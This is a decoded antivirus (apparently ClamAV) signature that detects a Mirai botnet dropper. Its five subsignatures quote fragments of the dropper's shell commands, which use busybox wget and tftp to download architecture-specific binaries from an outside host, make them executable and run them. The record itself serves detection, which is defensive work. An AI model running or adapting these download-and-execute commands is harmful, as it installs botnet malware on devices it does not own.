VIRUS NAME: Unix.Dropper.Mirai-7135873-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: 0&1&2&3&4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
iina.mashiro.cf/mips;/bin/busybox chmod +x mips; ./mips self.download|| rm mips -rf
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
oad || rm arm -rf ; /bin/busybox tftp -g shiina.mashiro.cf -r arm; /bin/busybox chmod 777 arm ;./arm self.download||rm arm -rf;/
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
bin/busybox wget http://shiina.mashiro.cf/mpsl ; chmod +x mpsl ; ./mpsl self.download || rm mpsl -rf;/bin/busybox wget http://sh
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /tmp/||cd /usr/sbin||cd /var/tmp; /bin/busybox wget http://shiina.mashiro.cf/arm; /bin/busybox chmod 777 arm;./arm self.downl
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
shiina.mashiro.cf
